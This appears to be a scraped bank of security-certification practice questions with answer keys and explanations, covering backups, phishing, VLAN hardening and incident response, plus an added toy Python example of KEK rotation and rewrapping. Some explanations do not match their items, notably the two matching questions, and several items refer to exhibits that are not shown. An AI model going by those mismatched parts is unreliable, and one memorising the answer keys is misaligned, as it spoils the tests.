When a key-encryption key (KEK) is rotated, existing data-encryption keys (DEKs) that were wrapped with the old KEK version become unreadable unless the old KEK is retained or the DEKs are re-wrapped with the new KEK. Option B ensures that backups remain restorable by either keeping the old KEK version accessible or migrating DEKs to the new KEK, maintaining the chain of trust for decryption.

Exam trap

The trap here is that candidates assume deleting the old key immediately is a best practice for key hygiene, but they overlook that existing encrypted data depends on the old key for decryption until re-wrapping occurs.

How to eliminate wrong answers

Option A is wrong because deleting vault-kek-v1 immediately would render all existing DEKs that were encrypted with that key permanently unrecoverable, breaking backup restorability. Option C is wrong because re-encrypting the entire backup repository with a single shared password violates the principle of key separation and introduces a single point of failure, as a password compromise would expose all backups. Option D is wrong because exporting vault-kek-v2 into backup files defeats the purpose of key management by storing the key alongside the data, eliminating the security benefit of a separate key hierarchy.
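
The key hierarchy the question depends on, as an added example that is not part of the original page or any vault product: each backup has its own data-encryption key (DEK) wrapped by a versioned key-encryption key (KEK), rotation adds `vault-kek-v2` for new wraps while `vault-kek-v1` stays available for unwrapping, rewrapping moves the small wrapped DEKs to the new version without touching the bulk ciphertext, and retiring a version is refused while any backup still references it. The key names follow the question's options; the cipher is a stdlib HMAC-based toy (encrypt-then-MAC) standing in for a real AEAD or AES Key Wrap so the block runs offline, and it is not production cryptography.

```python
"""Envelope encryption with a versioned KEK: rotate, rewrap, and refuse to retire
a KEK version that wrapped DEKs still depend on.

Added example for the key-rotation question above; not from the page or any vault
product. Key names follow the question. The cipher is an HMAC-based toy (stdlib
only, encrypt-then-MAC) standing in for AES-GCM / AES Key Wrap; it demonstrates the
key hierarchy, not production-grade cryptography.
"""
import hmac
import os
from hashlib import sha256


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, counter = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), sha256).digest()
        counter += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Toy authenticated encryption: nonce || ciphertext || tag."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, sha256).digest()


def unseal(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, sha256).digest()):
        raise ValueError("wrong key or tampered data")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class KeyVault:
    """Holds KEK versions; `current` wraps new DEKs, older versions only unwrap."""
    def __init__(self):
        self.keks = {"vault-kek-v1": os.urandom(32)}
        self.current, self._next = "vault-kek-v1", 2

    def rotate(self) -> str:
        self.current = f"vault-kek-v{self._next}"
        self.keks[self.current] = os.urandom(32)
        self._next += 1
        return self.current

    def wrap(self, dek: bytes):
        return self.current, seal(self.keks[self.current], dek)

    def unwrap(self, version: str, wrapped: bytes) -> bytes:
        if version not in self.keks:
            raise KeyError(f"{version} has been retired; DEK cannot be unwrapped")
        return unseal(self.keks[version], wrapped)

    def retire(self, version: str, backups) -> None:
        """The guard the question is about: never delete a KEK still in use."""
        still_used = [b["name"] for b in backups if b["kek_version"] == version]
        if still_used:
            raise RuntimeError(f"{version} still wraps DEKs for: {still_used}")
        del self.keks[version]


def create_backup(vault: KeyVault, name: str, data: bytes) -> dict:
    dek = os.urandom(32)                      # one DEK per backup object
    version, wrapped = vault.wrap(dek)
    return {"name": name, "kek_version": version, "wrapped_dek": wrapped,
            "ciphertext": seal(dek, data)}


def restore_backup(vault: KeyVault, backup: dict) -> bytes:
    dek = vault.unwrap(backup["kek_version"], backup["wrapped_dek"])
    return unseal(dek, backup["ciphertext"])


def rewrap_all(vault: KeyVault, backups) -> int:
    """Move every DEK to the current KEK; only the small wrapped DEK changes,
    the bulk ciphertext is never re-encrypted. Returns how many were rewrapped."""
    n = 0
    for b in backups:
        if b["kek_version"] != vault.current:
            dek = vault.unwrap(b["kek_version"], b["wrapped_dek"])
            b["kek_version"], b["wrapped_dek"] = vault.wrap(dek)
            n += 1
    return n
```

The order that keeps restores working is rotate, rewrap, then retire; `retire` raising while `vault-kek-v1` is still referenced is what stops option A from silently destroying every backup, and `rewrap_all` shows why option C's full re-encryption is unnecessary.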

931
MCQeasy

A company wants to make sure it can recover quickly after ransomware, even if the production network is unavailable. Which backup approach is the best choice?

A.Store backups only on the same file server so they are easy to access.
B.Keep an offline copy of backups that is disconnected from production systems.
C.Use a single monthly backup and never test restores to save time.
D.Save backups in the same cloud account using the same admin credentials.
AnswerB

Offline backups are harder for ransomware to encrypt and can support recovery when online systems are unavailable.

Why this answer

Option B is correct because an offline (air-gapped) backup, such as a tape stored in a safe or a disconnected external drive, ensures that ransomware cannot encrypt or delete the backup data. This approach guarantees recoverability even when the production network is completely compromised or unavailable, aligning with the 3-2-1 backup rule (three copies, two media types, one offsite/offline).

Exam trap

The trap here is that candidates may think 'offline' means simply not connected to the internet, but the key is physical or logical disconnection from the production network to prevent ransomware from reaching the backup during an active attack.

How to eliminate wrong answers

Option A is wrong because storing backups on the same file server means they share the same attack surface; ransomware can encrypt or delete them alongside production data, making recovery impossible. Option C is wrong because a single monthly backup without testing restores violates the principle of recovery point objective (RPO) and recovery time objective (RTO); untested backups may be corrupt or incomplete, and the long interval between backups risks significant data loss.

932
MCQ (easy)

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

A. Smishing, because the attack is delivered by text message.
B. Watering hole, because the attacker compromised the HR partner's website.
C. Spoofing only, because the attacker copied the HR logo in the message.
D. Port scanning, because the attacker wants to find open services on the phone.
Answer: A

Smishing is phishing through SMS or similar text messaging, often using urgency and a trusted name to steal credentials or redirect victims.

Why this answer

This is smishing because the attack vector is a text message (SMS) that attempts to trick the recipient into clicking a malicious link and providing credentials. Smishing is a form of social engineering that exploits the trust in SMS communications, often impersonating a legitimate entity like HR to create urgency. The goal is credential theft, not technical exploitation of the phone's services.

Exam trap

CompTIA often tests the distinction between the delivery method (SMS = smishing) and the underlying technique (spoofing), so candidates mistakenly choose 'spoofing only' because they see a faked logo or sender ID, ignoring that the attack is defined by its vector.

How to eliminate wrong answers

Option B is wrong because a watering hole attack compromises a website frequently visited by the target group, not by sending a direct text message; the attacker does not compromise the HR partner's website here. Option C is wrong because spoofing alone is a technique (e.g., faking the sender ID or logo), but the full attack is smishing, which includes the social engineering delivery via SMS; the question asks for the attack type, not just one component. Option D is wrong because port scanning is a network reconnaissance technique to find open ports and services, not a method to trick a user into clicking a link via text message.

933
Multi-Select (hard)

A virtualization host connects to an access switch through one Ethernet link. It must carry only VLAN 30 for production VMs and VLAN 40 for management VMs. A review finds the link currently accepts every VLAN, uses VLAN 1 as the native VLAN, and a guest VLAN can accidentally be added later. Which two changes best harden the design? Select two.

Select 2 answers
A. Prune the trunk so it carries only VLAN 30 and VLAN 40, not every possible VLAN.
B. Leave the trunk open to all VLANs so future changes require no switch updates.
C. Change the native VLAN to an unused ID to reduce VLAN-hopping and mis-tagging risk.
D. Keep VLAN 1 as the native VLAN because it is the vendor default and easiest to support.
E. Enable dynamic trunk negotiation on the host link so the virtualization server can discover VLANs automatically.
Answers: A, C

Limiting the trunk to the exact VLANs needed reduces the chance of accidental exposure or unauthorized traffic crossing the link. This is both a security and operational control because it makes the path easier to audit and less likely to carry unplanned networks. Trunk pruning is a straightforward hardening step for segmented environments.

Why this answer

Option A is correct because pruning the trunk to carry only VLANs 30 and 40 reduces the attack surface by preventing unauthorized VLANs (like a guest VLAN) from being accidentally added later. This aligns with the principle of least privilege for network segmentation, ensuring only necessary traffic traverses the link.

Exam trap

The trap here is that candidates often assume keeping VLAN 1 as the native VLAN is acceptable because it is the default, but the SY0-701 exam emphasizes changing it to an unused ID to prevent VLAN hopping and mis-tagging risks.

934
MCQ (medium)

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

A. Whaling
B. Spear phishing
C. Vishing
D. Pharming
Answer: A

Correct. Whaling specifically targets senior executives or high-value individuals within an organization, often using urgent or authoritative requests to trick them into transferring money or revealing sensitive information.

Why this answer

This attack is whaling because it specifically targets senior executives (the 'big fish') with a fraudulent email impersonating the CEO to request urgent wire transfers. Whaling is a form of phishing that focuses on high-profile individuals within an organization, leveraging their authority and access to sensitive financial operations. The attack exploits the trust and urgency associated with executive communications to bypass standard security controls.

Exam trap

CompTIA often tests the distinction between whaling and spear phishing, where candidates mistakenly choose spear phishing because they overlook that whaling is a specific subtype targeting executives, not just any individual.

How to eliminate wrong answers

Option B (Spear phishing) is wrong because spear phishing targets specific individuals or groups but does not exclusively focus on senior executives; it is a broader category that includes whaling as a subset. Option C (Vishing) is wrong because vishing uses voice calls or VoIP to deceive victims, not email-based messages. Option D (Pharming) is wrong because pharming redirects users from legitimate websites to fraudulent ones by manipulating DNS or host files, not by sending deceptive emails.

935
MCQ (medium)

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

A. Open the link and compare it with the supplier's branding
B. Reply to the text and ask the sender to confirm the request
C. Verify the request using a known supplier contact method before taking action
D. Forward the message to finance so they can decide whether it is legitimate
Answer: C

Out-of-band verification through a trusted phone number or established contact path is the safest way to confirm legitimacy.

Why this answer

Option C is correct because the clerk should independently verify the request using a known supplier contact method (e.g., a phone number on file) before taking any action. This prevents falling victim to a social engineering attack, such as a phishing or business email compromise (BEC) attempt, where the attacker spoofs the sender's identity to redirect payments. Verifying through an out-of-band channel ensures the request is legitimate, as the link in the message could lead to a credential-harvesting site or malware download.

Exam trap

The trap here is that candidates may choose Option D, thinking that forwarding to finance is a safe escalation, but the SY0-701 exam emphasizes that the first step is always independent verification using a trusted method, not delegating or relying on the suspicious communication channel.

How to eliminate wrong answers

Option A is wrong because opening the link and comparing branding is unsafe; the link could lead to a lookalike domain that mimics the supplier's portal, and merely comparing branding does not verify the sender's identity or the link's authenticity, as attackers can easily replicate logos and styles. Option B is wrong because replying to the text allows the attacker to continue the social engineering; the reply goes to the same compromised channel, and the attacker can simply confirm the request, providing no real verification. Option D is wrong because forwarding the message to finance shifts responsibility without verifying the request first; finance may also be deceived by the same spoofed message, and the clerk should independently verify before escalating.

936
MCQ (medium)

Based on the exhibit, which document should be updated first to reflect the new ticketing platform while keeping approval requirements unchanged?

A. Policy, because every tool change requires rewriting the corporate mandate.
B. Standard, because the approval workflow and evidence rules are still the same.
C. Procedure, because the step-by-step instructions and screenshots are now outdated.
D. Guideline, because optional content should always be revised before mandatory content.
Answer: C

Procedures contain the operational steps people follow to complete a task. Since the workflow and approval rules remain the same but the tool interface changed, the step-by-step guide should be updated first. That keeps the control intent intact while preventing user confusion and process errors.

Why this answer

The procedure document contains the step-by-step instructions, including screenshots and specific commands for the old ticketing platform. Since the new platform changes the user interface and workflow steps, the procedure must be updated first to ensure technicians can follow accurate instructions. Policies and standards define high-level rules and approval requirements, which remain unchanged, so they do not need immediate revision.

Exam trap

The trap here is that candidates confuse 'procedure' with 'standard' or 'policy,' assuming any tool change requires updating the highest-level document, when in fact only the detailed implementation steps (procedure) need revision if the rules and requirements remain unchanged.

How to eliminate wrong answers

Option A is wrong because a policy is a high-level mandate that sets overall direction and requirements; changing a specific tool does not automatically require rewriting the entire policy, especially when approval requirements stay the same. Option B is wrong because a standard defines mandatory rules and baselines (e.g., evidence retention periods), and while the approval workflow and evidence rules are unchanged, the standard does not include the step-by-step instructions that are now outdated. Option D is wrong because a guideline is optional and non-binding; revising optional content before mandatory content is not a priority, and the question specifically asks for the document that should be updated first to reflect the new platform.

937
MCQ (hard)

Based on the exhibit, which control would most effectively reduce the remaining successful attacks?

Phishing awareness results:
Team A: click rate 8%, report rate 6%, median report time 52 min
Team B: click rate 7%, report rate 18%, median report time 14 min
Team C: click rate 12%, report rate 21%, median report time 10 min
Incident summary: Team C had one mailbox takeover after a user approved an MFA push while traveling.

A. Continue generic awareness posters without changing technical controls.
B. Replace push-based MFA with phishing-resistant MFA and reinforce verification for unusual login prompts.
C. Disable MFA on mobile devices so users can log in faster.
D. Allow employees to approve prompts from any device to reduce help desk calls.
Answer: B

Phishing-resistant MFA blocks prompt abuse, and verification steps help users resist social engineering during abnormal sign-in events.

Why this answer

Team C's successful attack was a mailbox takeover resulting from a user approving an MFA push notification while traveling. This indicates that push-based MFA is vulnerable to MFA fatigue attacks, where an attacker bombards the user with prompts until they approve. Replacing push-based MFA with phishing-resistant MFA (e.g., FIDO2/WebAuthn or hardware tokens) eliminates the possibility of approving a prompt from an untrusted device, and reinforcing verification for unusual login prompts adds a critical user behavior layer to detect anomalies.

Exam trap

CompTIA often tests the misconception that any MFA is equally secure; the trap here is that candidates may think push-based MFA is sufficient because it is 'multi-factor,' but the exam expects you to recognize that push-based MFA is vulnerable to fatigue attacks and that phishing-resistant MFA is the appropriate technical control to prevent such successful attacks.

How to eliminate wrong answers

Option A is wrong because generic awareness posters do not address the specific technical vulnerability of push-based MFA being susceptible to fatigue attacks; they are too vague and have already proven ineffective given Team C's high click rate and the successful attack. Option C is wrong because disabling MFA on mobile devices would remove the only authentication factor for mobile users, drastically increasing the risk of account compromise from stolen credentials or session hijacking. Option D is wrong because allowing employees to approve prompts from any device would exacerbate MFA fatigue by removing location/device context, making it easier for attackers to trick users into approving malicious requests.

938
Matching (easy)

Match each cryptographic concept to its best purpose.


Concepts
Matches

Makes data unreadable to anyone who does not have the correct key.

Creates a fixed-size fingerprint to detect whether data changed.

Adds random data before hashing passwords so identical passwords look different.

Lets others verify who signed the file and that it was not altered.

Replaces an encryption key before its approved lifetime ends.

Why these pairings

Confidentiality protects secrecy, integrity prevents tampering, authentication confirms identity, non-repudiation ensures proof of origin, availability ensures uptime, and accountability enables audit trails.

939
MCQ (easy)

A SOC analyst sees 20 failed logins for one user account, followed by a successful login 30 seconds later from the same office subnet. The user confirms they mistyped the password several times. What is the best conclusion?

A. It is definitely a brute-force attack and should be treated as confirmed compromise.
B. It is most likely a false positive caused by user error and should be documented after verification.
C. It is evidence of malware on the user's workstation until the device is rebuilt.
D. It proves the password was changed by an attacker and the account must be disabled immediately.
Answer: B

The failed logins match the user's explanation and the location is consistent with normal behavior.

Why this answer

The scenario shows 20 failed logins followed by a successful login from the same office subnet, and the user confirms they mistyped the password. This pattern is consistent with user error (e.g., Caps Lock or typo), not an automated brute-force attack, which would typically show a much higher volume of attempts from diverse IPs. The best conclusion is a false positive, which should be documented after verification to maintain accurate incident records.

Exam trap

The trap here is that candidates may overreact to multiple failed logins as a brute-force attack, ignoring the user's confirmation and the same-subnet source, which are classic indicators of user error rather than malicious activity.

How to eliminate wrong answers

Option A is wrong because a brute-force attack would involve hundreds or thousands of attempts from multiple IP addresses, not just 20 from the same subnet, and a successful login from the user's own subnet with user confirmation of error makes an attack unlikely. Option C is wrong because there is no evidence of malware; failed logins followed by a successful login from the same subnet are not indicative of malware activity, and rebuilding the device is an extreme, unnecessary response. Option D is wrong because the successful login occurred from the same office subnet, not an attacker's IP, and the user confirmed they mistyped the password; there is no evidence the password was changed, and disabling the account would be premature without further investigation.

940
MCQ (hard)

Based on the exhibit, which action should the security team prioritize next?

A. Send a company-wide reminder to never click links in email, regardless of sender.
B. Focus only on punitive action for users who failed the simulation.
C. Run the same broad awareness module again for all employees at the same time.
D. Deploy role-based phishing training, recurring simulations, and a simple reporting workflow.
Answer: D

The metrics show that departments with the most realistic, job-specific lures are clicking more often and reporting less frequently. Role-based training addresses the exact patterns employees encounter, while recurring simulations let the security team measure improvement over time. A clear reporting workflow also increases the chance that suspicious messages reach security quickly for validation and containment.

Why this answer

Option D is correct because the exhibit, which is not reproduced here, indicates that a phishing simulation has been completed and that the organization needs to move from a one-size-fits-all awareness approach to a sustainable, role-based security training program. Deploying role-based phishing training, recurring simulations, and a simple reporting workflow addresses the root cause of user susceptibility by tailoring content to specific job functions, reinforcing learning through repetition, and enabling users to report suspicious emails easily, which aligns with NIST SP 800-50 and the continuous improvement cycle of security awareness programs.

Exam trap

The trap here is that candidates often choose a quick, one-time fix (like a company-wide reminder or repeating the same module) instead of recognizing that effective security awareness requires a continuous, role-based, and measurable program with a reporting mechanism, which is a core concept in Security Program Management and Oversight for SY0-701.

How to eliminate wrong answers

Option A is wrong because a company-wide reminder to never click links in email is overly broad, unrealistic for daily work, and does not address the need for role-specific training or a reporting mechanism; it also ignores that some legitimate business email requires clicking links. Option B is wrong because focusing only on punitive action for users who failed the simulation is counterproductive, as it discourages reporting and learning, and does not address the systemic need for improved training and a positive security culture. Option C is wrong because running the same broad awareness module again for all employees at the same time fails to provide role-based customization, does not incorporate recurring simulations to reinforce learning, and lacks a simple reporting workflow, which are essential for effective phishing defense as recommended by industry frameworks like the SANS Security Awareness Maturity Model.

941
MCQ (medium)

A security team is defining the minimum approved configuration for all new Linux web servers. The document must require specific logging settings, approved packages, and disabled services, and administrators must check servers against it during audits. Which governance artifact best fits this need?

A. Guideline, because it suggests recommended settings without requiring enforcement.
B. Baseline, because it defines the minimum approved configuration that systems should meet.
C. Policy, because it is the high-level statement of intent for the organization.
D. Procedure, because it explains the exact steps to install and configure each server.
Answer: B

A baseline is the correct artifact when an organization wants a documented, measurable starting configuration for systems. It captures the approved minimum settings, such as required services, logging, and packages, and supports consistent builds and compliance checks. Because the question describes a configuration that administrators will audit against, a baseline fits better than a guideline or a general policy.

Why this answer

A baseline is the correct governance artifact because it defines the minimum approved configuration that systems must meet, including specific logging settings, approved packages, and disabled services. In the context of Linux web servers, a baseline ensures consistent security posture by providing a measurable standard that administrators can audit against, such as verifying that rsyslog is configured for remote logging, only packages like Apache or Nginx from approved repositories are installed, and services like Telnet or FTP are disabled. This aligns with the requirement for enforcement and auditability, unlike a guideline which is merely advisory.

Exam trap

The trap here is that candidates confuse 'policy' with 'baseline' because both are governance documents, but a policy is a broad directive (e.g., 'secure all systems') while a baseline provides the specific, auditable technical controls (e.g., 'disable Telnet, enable auditd, use only Apache 2.4') that administrators must enforce.

How to eliminate wrong answers

Option A is wrong because a guideline suggests recommended settings without requiring enforcement, but the scenario explicitly requires administrators to check servers against the document during audits, implying mandatory compliance. Option C is wrong because a policy is a high-level statement of intent (e.g., 'all servers must be secure') that lacks the specific technical details (e.g., exact logging settings, package lists, disabled services) needed for a configuration audit; a baseline operationalizes policy into measurable technical requirements.

942
MCQ (medium)

A SOC analyst confirms that an employee entered credentials into a phishing site and that the mailbox now shows a new forwarding rule sending messages to an external address. The account is still signed in on a laptop and a mobile phone. What is the best next action?

A. Wait for the user to log out naturally before taking action.
B. Revoke active sessions and force a password reset for the account.
C. Archive the mailbox and close the ticket after notifying the user.
D. Delete the forwarding rule only and consider the incident closed.
Answer: B

This removes the attacker’s current access path and prevents reuse of the compromised credentials.

Why this answer

Option B is correct because the immediate priority is to contain the compromised account by terminating all active sessions (revoking OAuth tokens, clearing SAML sessions) and forcing a password reset to prevent further unauthorized access. The mailbox forwarding rule indicates the attacker has established persistence, and the active sessions on the laptop and mobile phone mean the attacker could still be using the account. Revoking sessions ensures the attacker cannot continue exfiltration or lateral movement, while the password reset invalidates the stolen credentials.

Exam trap

The trap here is that candidates may think waiting for the user to log out (Option A) is acceptable because the user is still signed in, but in security operations, you must assume the attacker has active access and act immediately to revoke sessions rather than relying on user behavior.

How to eliminate wrong answers

Option A is wrong because waiting for the user to log out naturally gives the attacker continued access to the account, allowing further data exfiltration via the forwarding rule or other malicious actions. Option C is wrong because archiving the mailbox and closing the ticket without revoking sessions or resetting the password leaves the account compromised, the forwarding rule active, and the attacker still able to access the account and modify settings.

943
MCQ (hard)

Employees use a browser-based SaaS portal, a native expense app, and an internal API. The company wants one corporate identity, API access without separate passwords, and automatic account removal when HR disables a user. Which solution best fits?

A. Use LDAP binds directly against each application and manage local passwords separately.
B. Use OpenID Connect federation with OAuth 2.0 access tokens and SCIM provisioning.
C. Use shared local accounts in each application and sync passwords nightly from the directory.
D. Use Kerberos constrained delegation to each vendor tenant for every application.
Answer: B

OIDC handles modern sign-in across browser and mobile experiences, OAuth supports API access, and SCIM automates provisioning and deprovisioning.

Why this answer

OpenID Connect (OIDC) federation with OAuth 2.0 provides a single corporate identity (federated SSO), allows API access without separate passwords (using access tokens), and SCIM provisioning automates account removal when HR disables a user. This combination meets all three requirements: unified identity, passwordless API access, and lifecycle management.

Exam trap

The trap here is that candidates often confuse LDAP or Kerberos (both legacy on-premises protocols) with modern cloud federation, failing to recognize that OIDC + OAuth 2.0 + SCIM is the only combination that provides SSO, token-based API access, and automated provisioning for SaaS and native apps.

How to eliminate wrong answers

Option A is wrong because LDAP binds require separate password management per application and do not provide API access without passwords, nor do they support automatic account removal via SCIM. Option C is wrong because shared local accounts with nightly password sync violate the requirement for a single corporate identity and do not enable API access without passwords; they also lack automatic provisioning/deprovisioning. Option D is wrong because Kerberos constrained delegation is designed for on-premises Windows environments and does not federate to browser-based SaaS or native apps, nor does it support SCIM-based lifecycle management.

944
MCQ (medium)

A SOC analyst confirms that a workstation is encrypting local files and attempting SMB connections to nearby hosts. The user is still logged in, and the business wants to limit spread without destroying evidence. What is the best immediate action?

A. Power the workstation off immediately and leave it in place
B. Quarantine the workstation from the network using EDR or switch port containment
C. Run a full antivirus scan while the workstation remains connected
D. Wipe and reimage the workstation from a standard build image
Answer: B

This is the best immediate containment action because it stops further spread while preserving evidence. EDR quarantine or disabling the switch port isolates the infected host without unnecessarily powering it down. The SOC can then collect volatile and disk evidence, determine the scope of infection, and proceed with eradication and recovery steps in the proper incident response sequence.

Why this answer

Option B is correct because quarantining the workstation via EDR or switch port containment immediately stops the SMB-based lateral movement and further encryption of network shares, while preserving the volatile evidence (memory, running processes, encryption keys) for forensic analysis. This aligns with the business requirement to limit spread without destroying evidence, as powering off or reimaging would lose critical forensic data.

Exam trap

The trap here is that candidates think powering off (Option A) is the fastest way to stop spread, but CompTIA emphasizes preserving evidence and avoiding destruction of volatile data, making network quarantine the correct choice.

How to eliminate wrong answers

Option A is wrong because powering off the workstation destroys volatile evidence (e.g., encryption keys in memory, active network connections) and may trigger anti-forensic mechanisms in the ransomware. Option C is wrong because running a full antivirus scan while the workstation remains connected allows the ransomware to continue encrypting local files and spreading via SMB to nearby hosts, violating the goal to limit spread. Option D is wrong because wiping and reimaging destroys all evidence, including the ransomware binary, encryption artifacts, and forensic traces needed for incident response and attribution.

945
MCQ (easy)

A company needs a public website that anyone on the internet can reach, but the application and database servers must stay off the internet. Where should the web server be placed?

A. On the internal user network with the database server.
B. In a DMZ separated from the internal application and database networks.
C. On the same subnet as the firewall management interface.
D. Directly on the database subnet so performance is faster.
Answer: B

A DMZ is the best choice because it allows public access to the web server while keeping the application and database tiers behind additional security controls. If the web server is compromised, the attacker still has to cross another boundary to reach internal systems. This layered zoning is a standard architecture pattern for public-facing services and helps contain risk.

Why this answer

The web server must be placed in a DMZ (demilitarized zone) because this network segment is designed to host publicly accessible services while isolating them from internal networks. The DMZ allows inbound traffic from the internet to the web server, but the application and database servers remain on internal networks with strict firewall rules that block direct internet access, enforcing a layered security architecture.

Exam trap

The trap here is that candidates often confuse a DMZ with a 'public subnet' and think placing the web server directly on the internet-facing side of the firewall is sufficient, but the DMZ is a separate, isolated network segment that enforces strict traffic inspection and prevents direct lateral movement to internal resources.

How to eliminate wrong answers

Option A is wrong because placing the web server on the internal user network with the database server would expose both to direct internet traffic, violating the requirement to keep application and database servers off the internet and creating a single point of compromise. Option C is wrong because the firewall management interface subnet is a highly restricted administrative network; placing a public web server there would expose management interfaces to attack and violate security best practices. Option D is wrong because placing the web server directly on the database subnet would allow internet traffic to reach the database server directly, bypassing the application layer and defeating the purpose of network segmentation.

946
Matching (easy)

Match each control category to the best example.


Concepts
Matches

A firewall blocks unauthorized inbound traffic.

A written policy requires manager approval before access is granted.

A badge reader controls entry to a server room.

A SIEM alert notifies the SOC about a failed login pattern.

Restoring a system from a known-good backup after a failure.

Why these pairings

Control categories are matched to examples: preventive controls block, detective controls identify, corrective controls fix, deterrent controls discourage, compensating controls provide alternatives, and directive controls set rules.

947
Multi-Select (hard)

A Linux operations team must run a nightly maintenance workflow on 60 servers to rotate logs and restart one service. Security does not allow interactive root logins, and every execution must be auditable. Which two practices best support secure administration? Select two.

Select 2 answers
A. Use a dedicated service account with sudo rights limited to the exact commands in the workflow.
B. Run the workflow through a centralized automation platform that records execution time and output.
C. Hardcode the root password in the script so the same job works everywhere.
D. Share one privileged SSH key among all administrators for convenience.
E. Disable command logging so the maintenance output is easier to review.
Answers: A, B

Least-privilege sudo access lets the job run without giving the account broad interactive root power.

Why this answer

Option A is correct because using a dedicated service account with sudo rights limited to the exact commands in the workflow enforces the principle of least privilege. This ensures that even if the account is compromised, an attacker can only execute the specific log rotation and service restart commands, not arbitrary root-level operations. It also eliminates the need for interactive root logins, satisfying the security policy while maintaining auditability through sudo logs.

Exam trap

The trap here is that candidates often think hardcoding credentials or sharing keys is acceptable for convenience, but the SY0-701 exam strictly tests the principle of least privilege and the necessity of non-repudiation through dedicated accounts and centralized logging.

948
Multi-Select · medium

A security analyst is reviewing the organization's incident response procedures. According to the NIST SP 800-61 framework, which four of the following are recognized phases of the incident response lifecycle? (Choose four.)

Select 4 answers
A. Preparation
B. Detection and Analysis
C. Containment, Eradication, and Recovery
D. Post-Incident Activity
E. Threat Hunting
F. Risk Assessment

Why this answer

The NIST SP 800-61 Revision 2 framework defines the incident response lifecycle as consisting of four phases: Preparation, Detection and Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. These phases form a continuous cycle, with lessons learned from Post-Incident Activity feeding back into Preparation. The question asks for the four recognized phases, and these four options directly match the NIST model.

Exam trap

The trap here is that candidates may confuse proactive security activities like Threat Hunting or Risk Assessment with the formal incident response phases, but NIST SP 800-61 strictly lists only the four phases given as correct answers.

949
MCQ · easy

A legacy application cannot be patched for two weeks, but the security team still wants to reduce risk in the meantime. What is the best temporary measure?

A. Do nothing until the patch window opens.
B. Add a compensating control such as restricting access to the system.
C. Disable all logging so the system runs faster.
D. Rename the application so attackers cannot find it.
Answer: B

A compensating control lowers risk while the permanent fix is unavailable.

Why this answer

Option B is correct because implementing a compensating control, such as restricting network access via firewall rules or disabling unnecessary services, reduces the attack surface while the legacy application remains unpatched. This aligns with the principle of defense-in-depth, where temporary mitigations like access control lists (ACLs) or host-based firewalls can block exploit vectors until the patch is applied.

Exam trap

The trap here is that candidates may choose 'Do nothing' assuming patching is the only valid action, but CompTIA expects you to recognize that compensating controls are a standard risk management strategy when immediate patching is not feasible.

How to eliminate wrong answers

Option A is wrong because doing nothing leaves the vulnerability exposed, increasing the risk of exploitation during the two-week window, which violates the security team's goal of risk reduction. Option C is wrong because disabling logging degrades visibility and audit capabilities, making it harder to detect or investigate attacks, and does not address the underlying vulnerability.

950
MCQ · easy

A company uses a SaaS file-sharing platform for employee documents. Which action is the company's responsibility, not the provider's?

A. Patching the vendor's application servers.
B. Setting user sharing permissions and access controls for company data.
C. Replacing failed disks in the provider's storage cluster.
D. Maintaining the cloud provider's identity center and hypervisor.
Answer: B

In a SaaS model, the provider manages the application and underlying infrastructure, but the customer remains responsible for how the service is used. That includes user provisioning, access permissions, sharing settings, and data handling decisions. Configuring who can see or edit documents is a customer duty because it directly affects the organization's confidentiality and compliance obligations.

Why this answer

In a SaaS model, the provider manages the underlying infrastructure, including application servers, storage, and hypervisors. The customer is responsible for configuring access controls and permissions for their own data within the application. Option B correctly identifies this shared responsibility boundary.

Exam trap

The trap here is that candidates often confuse the SaaS model with IaaS or PaaS, incorrectly assuming the customer is responsible for patching or hardware maintenance, when in fact the provider handles all infrastructure layers in SaaS.

How to eliminate wrong answers

Option A is wrong because patching the vendor's application servers is the provider's responsibility under the SaaS shared responsibility model, not the customer's. Option C is wrong because replacing failed disks in the provider's storage cluster is an infrastructure maintenance task owned by the SaaS provider. Option D is wrong because maintaining the cloud provider's identity center and hypervisor is part of the provider's responsibility for the underlying platform, not the customer's.

951
MCQ · hard

Based on the exhibit, which issue should be remediated FIRST? The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

A. Internet-facing VPN appliance
B. Internal HR file server
C. Lab workstation
D. DMZ reporting server
Answer: A

This asset is externally reachable, has a known public exploit, and lacks compensating controls. That combination creates the highest immediate likelihood of compromise.

Why this answer

The Internet-facing VPN appliance is the highest priority because it is directly exposed to untrusted networks (the Internet), making it the most likely entry point for attackers. A compromise here could lead to full network access, bypassing all other security controls, which represents the greatest real-world risk regardless of its severity score.

Exam trap

The trap here is that candidates often fixate on the highest CVSS severity score (e.g., a critical vulnerability on the internal server) rather than considering the attack surface and likelihood of exploitation, which is the core of risk-based prioritization.

How to eliminate wrong answers

Option B (Internal HR file server) is wrong because it resides on the internal network and is not directly reachable from the Internet, so its exposure is limited to already-authenticated users; remediating it first would not reduce external attack surface. Option C (Lab workstation) is wrong because it is isolated in a lab environment, typically with restricted network access and no sensitive production data, making its compromise low-impact. Option D (DMZ reporting server) is wrong because while it is in a DMZ, it is not Internet-facing (it is behind the firewall and only accessible from internal or specific external sources), so its risk is lower than a directly exposed VPN gateway.

952
MCQ · hard

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

A. Ransomware campaign
B. Fileless attack
C. Worm propagation
D. Rootkit persistence
Answer: B

The exhibit shows legitimate Windows tools launching hidden, encoded PowerShell from a scheduled task, with no dropped executable on disk. That pattern strongly suggests a fileless attack, where the payload runs primarily in memory and uses trusted utilities to reduce visibility. The periodic connections after execution also fit a lightweight backdoor or loader rather than a traditional malware binary.

Why this answer

